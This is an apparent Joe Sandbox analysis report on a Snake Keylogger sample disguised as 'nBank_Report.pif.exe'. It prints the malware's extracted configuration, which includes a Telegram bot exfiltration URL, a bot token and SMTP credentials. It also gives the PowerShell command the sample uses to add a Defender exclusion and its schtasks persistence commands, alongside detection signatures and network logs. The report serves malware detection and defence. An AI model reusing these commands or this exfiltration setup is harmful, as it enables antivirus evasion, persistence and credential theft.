Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nBank_Report.pif.exe

Overview

General Information

Sample name:nBank_Report.pif.exe
Analysis ID:1519333
MD5:d97c2259e60a42aead2559f198ff9a5a
SHA1:5861e84df676af552106ab15c308ad44662a563a
SHA256:903b831a6844fe65857fc4084226322434c939ff5fb4425da901bfed34399fd4
Tags:exeuser-Porcupine
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Disables CMD prompt
Disables Windows system restore
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Moves itself to temp directory
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nBank_Report.pif.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\nBank_Report.pif.exe" MD5: D97C2259E60A42AEAD2559F198FF9A5A)
    • powershell.exe (PID: 8024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 8040 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nBank_Report.pif.exe (PID: 8188 cmdline: "C:\Users\user\Desktop\nBank_Report.pif.exe" MD5: D97C2259E60A42AEAD2559F198FF9A5A)
    • nBank_Report.pif.exe (PID: 3276 cmdline: "C:\Users\user\Desktop\nBank_Report.pif.exe" MD5: D97C2259E60A42AEAD2559F198FF9A5A)
  • VtPPJdSqnkbmja.exe (PID: 7100 cmdline: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe MD5: D97C2259E60A42AEAD2559F198FF9A5A)
    • schtasks.exe (PID: 1256 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VtPPJdSqnkbmja.exe (PID: 5500 cmdline: "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe" MD5: D97C2259E60A42AEAD2559F198FF9A5A)
      • WerFault.exe (PID: 2596 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2540 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendMessage?chat_id=1394550246", "Username": "sbozkurt@medicana.site", "Password": "24/7TryLock", "Host": "mail.medicana.site", "Port": "587", "Token": "6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U", "Chat_id": "1394550246", "Version": "5.1"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    sslproxydump.pcapMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
    • 0xfbfd:$m3: SnakePW
    • 0x10160:$m3: SnakePW
    • 0x1df84:$m3: SnakePW
    • 0x1e4e7:$m3: SnakePW
    • 0x1ea3b:$m3: SnakePW
    • 0x1ef9e:$m3: SnakePW
    • 0x1f4f3:$m3: SnakePW
    • 0x1fa56:$m3: SnakePW
    • 0xce699:$m3: SnakePW
    • 0xcebfc:$m3: SnakePW
    • 0x17d857:$m3: SnakePW
    • 0x17ddba:$m3: SnakePW
    • 0x22ca2f:$m3: SnakePW
    • 0x22cf92:$m3: SnakePW
    • 0x2dbc08:$m3: SnakePW
    • 0x2dc16b:$m3: SnakePW
    • 0x38ade0:$m3: SnakePW
    • 0x38b343:$m3: SnakePW
    • 0x44004f:$m3: SnakePW
    • 0x4405b2:$m3: SnakePW
    • 0x4ef227:$m3: SnakePW

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.3886664444.0000000007090000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x14c03:$a1: get_encryptedPassword
          • 0x14eef:$a2: get_encryptedUsername
          • 0x149ff:$a3: get_timePasswordChanged
          • 0x14afa:$a4: get_passwordField
          • 0x14c19:$a5: set_encryptedPassword
          • 0x162ce:$a7: get_logins
          • 0x16231:$a10: KeyLoggerEventArgs
          • 0x15e7f:$a11: KeyLoggerEventArgsEventHandler
          0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x19d84:$x1: $%SMTPDV$
          • 0x18640:$x2: $#TheHashHere%&
          • 0x19d2c:$x3: %FTPDV$
          • 0x185e0:$x4: $%TelegramDv$
          • 0x15e7f:$x5: KeyLoggerEventArgs
          • 0x16231:$x5: KeyLoggerEventArgs
          • 0x19d50:$m2: Clipboard Logs ID
          • 0x19f84:$m2: Screenshot Logs ID
          • 0x1a094:$m2: keystroke Logs ID
          • 0x1a36e:$m3: SnakePW
          • 0x19f5c:$m4: \SnakeKeylogger\
          Click to see the 39 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.nBank_Report.pif.exe.49954c0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.nBank_Report.pif.exe.49954c0.3.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              0.2.nBank_Report.pif.exe.49954c0.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x12fbb:$a1: get_encryptedPassword
              • 0x132a7:$a2: get_encryptedUsername
              • 0x12db7:$a3: get_timePasswordChanged
              • 0x12eb2:$a4: get_passwordField
              • 0x12fd1:$a5: set_encryptedPassword
              • 0x14686:$a7: get_logins
              • 0x145e9:$a10: KeyLoggerEventArgs
              • 0x14237:$a11: KeyLoggerEventArgsEventHandler
              0.2.nBank_Report.pif.exe.49954c0.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1ad25:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x19f57:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x1a38a:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1b3c9:$a5: \Kometa\User Data\Default\Login Data
              0.2.nBank_Report.pif.exe.49954c0.3.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x13bbb:$s1: UnHook
              • 0x13bc2:$s2: SetHook
              • 0x13bca:$s3: CallNextHook
              • 0x13bd7:$s4: _hook
              Click to see the 28 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nBank_Report.pif.exe", ParentImage: C:\Users\user\Desktop\nBank_Report.pif.exe, ParentProcessId: 7792, ParentProcessName: nBank_Report.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", ProcessId: 8024, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nBank_Report.pif.exe", ParentImage: C:\Users\user\Desktop\nBank_Report.pif.exe, ParentProcessId: 7792, ParentProcessName: nBank_Report.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", ProcessId: 8024, ProcessName: powershell.exe
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe, ParentImage: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe, ParentProcessId: 7100, ParentProcessName: VtPPJdSqnkbmja.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp", ProcessId: 1256, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nBank_Report.pif.exe", ParentImage: C:\Users\user\Desktop\nBank_Report.pif.exe, ParentProcessId: 7792, ParentProcessName: nBank_Report.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp", ProcessId: 8040, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nBank_Report.pif.exe", ParentImage: C:\Users\user\Desktop\nBank_Report.pif.exe, ParentProcessId: 7792, ParentProcessName: nBank_Report.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe", ProcessId: 8024, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\nBank_Report.pif.exe", ParentImage: C:\Users\user\Desktop\nBank_Report.pif.exe, ParentProcessId: 7792, ParentProcessName: nBank_Report.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp", ProcessId: 8040, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T11:33:24.731573+020028033053Unknown Traffic192.168.2.1049708188.114.96.3443TCP
              2024-09-26T11:33:26.027125+020028033053Unknown Traffic192.168.2.1049710188.114.96.3443TCP
              2024-09-26T11:33:29.394619+020028033053Unknown Traffic192.168.2.1049715188.114.96.3443TCP
              2024-09-26T11:33:31.198796+020028033053Unknown Traffic192.168.2.1049719188.114.96.3443TCP
              2024-09-26T11:33:32.490995+020028033053Unknown Traffic192.168.2.1049723188.114.96.3443TCP
              2024-09-26T11:33:33.345164+020028033053Unknown Traffic192.168.2.1049726188.114.96.3443TCP
              2024-09-26T11:33:36.365301+020028033053Unknown Traffic192.168.2.1049735188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T11:33:23.027672+020028032742Potentially Bad Traffic192.168.2.1049705132.226.247.7380TCP
              2024-09-26T11:33:24.168313+020028032742Potentially Bad Traffic192.168.2.1049705132.226.247.7380TCP
              2024-09-26T11:33:25.465209+020028032742Potentially Bad Traffic192.168.2.1049709132.226.247.7380TCP
              2024-09-26T11:33:29.730778+020028032742Potentially Bad Traffic192.168.2.1049714132.226.247.7380TCP
              2024-09-26T11:33:30.605753+020028032742Potentially Bad Traffic192.168.2.1049714132.226.247.7380TCP
              2024-09-26T11:33:31.933901+020028032742Potentially Bad Traffic192.168.2.1049721132.226.247.7380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-26T11:33:40.754476+020028530061A Network Trojan was detected192.168.2.1049740149.154.167.220443TCP
              2024-09-26T11:33:51.413512+020028530061A Network Trojan was detected192.168.2.1049745149.154.167.220443TCP
              2024-09-26T11:33:53.039904+020028530061A Network Trojan was detected192.168.2.1049746149.154.167.220443TCP
              2024-09-26T11:33:54.402488+020028530061A Network Trojan was detected192.168.2.1049747149.154.167.220443TCP
              2024-09-26T11:33:58.153767+020028530061A Network Trojan was detected192.168.2.1049749149.154.167.220443TCP
              2024-09-26T11:34:01.617431+020028530061A Network Trojan was detected192.168.2.1049751149.154.167.220443TCP
              2024-09-26T11:34:05.199736+020028530061A Network Trojan was detected192.168.2.1049753149.154.167.220443TCP
              2024-09-26T11:34:09.006114+020028530061A Network Trojan was detected192.168.2.1049755149.154.167.220443TCP
              2024-09-26T11:34:12.276265+020028530061A Network Trojan was detected192.168.2.1049757149.154.167.220443TCP
              2024-09-26T11:34:15.612041+020028530061A Network Trojan was detected192.168.2.1049760149.154.167.220443TCP
              2024-09-26T11:34:19.476772+020028530061A Network Trojan was detected192.168.2.1049762149.154.167.220443TCP
              2024-09-26T11:34:22.738009+020028530061A Network Trojan was detected192.168.2.1049764149.154.167.220443TCP
              2024-09-26T11:34:26.381197+020028530061A Network Trojan was detected192.168.2.1049766149.154.167.220443TCP
              2024-09-26T11:34:29.685168+020028530061A Network Trojan was detected192.168.2.1049768149.154.167.220443TCP
              2024-09-26T11:34:33.069221+020028530061A Network Trojan was detected192.168.2.1049770149.154.167.220443TCP
              2024-09-26T11:34:36.351719+020028530061A Network Trojan was detected192.168.2.1049772149.154.167.220443TCP
              2024-09-26T11:34:39.763010+020028530061A Network Trojan was detected192.168.2.1049774149.154.167.220443TCP
              2024-09-26T11:34:43.035445+020028530061A Network Trojan was detected192.168.2.1049776149.154.167.220443TCP
              2024-09-26T11:34:46.343009+020028530061A Network Trojan was detected192.168.2.1049778149.154.167.220443TCP
              2024-09-26T11:34:49.954596+020028530061A Network Trojan was detected192.168.2.1049780149.154.167.220443TCP
              2024-09-26T11:34:53.395041+020028530061A Network Trojan was detected192.168.2.1049782149.154.167.220443TCP
              2024-09-26T11:34:56.736137+020028530061A Network Trojan was detected192.168.2.1049784149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendMessage?chat_id=1394550246", "Username": "sbozkurt@medicana.site", "Password": "24/7TryLock", "Host": "mail.medicana.site", "Port": "587", "Token": "6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U", "Chat_id": "1394550246", "Version": "5.1"}
              Source: nBank_Report.pif.exe.3276.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendMessage"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeReversingLabs: Detection: 42%
              Multi AV Scanner detection for submitted file
              Source: nBank_Report.pif.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: nBank_Report.pif.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: nBank_Report.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49706 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49717 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49790 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49793 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49797 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49809 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49810 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49811 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49813 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49815 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49817 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49818 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49820 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49823 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49826 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49827 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49828 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49829 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49830 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49831 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49831 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49832 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49833 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49836 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49837 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49839 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49841 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49842 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49843 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49844 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49845 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49847 version: TLS 1.2
